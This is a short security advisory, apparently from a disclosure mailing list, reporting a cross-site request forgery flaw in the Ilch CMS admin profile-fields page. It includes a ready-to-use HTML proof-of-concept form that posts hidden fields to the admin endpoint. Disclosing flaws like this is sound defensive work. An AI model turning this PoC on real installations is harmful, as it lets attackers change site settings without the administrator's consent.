# Affected software: Ilch cms
# Type of vulnerability: csrf
# URL: http://www.ilch.de/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description: Ilch cms profile field csrf
# Proof of concept

http://demo.opensourcecms.com/ilch/admin.php?profilefields (online demo)

Above field was vulnerable to csrf vulnerability attacker was able to add
value to the field due to lack of csrf token

csrf poc:

<html>
      <body>
     <form action="
http://demo.opensourcecms.com/ilch/admin.php?profilefields" method="POST">
       <input type="hidden" name="sid" value="" />
       <input type="hidden" name="show" value="testvalue" />
       <input type="hidden" name="func" value="1" />
       <input type="hidden" name="sub" value="Eintragen" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


-- 

Best Regards,
*Ankit Bharathan.*

*Save Energy... Save Nature... Go Green...*
P *Consider the environment. Please don't print this e-mail unless
absolutely necessary.*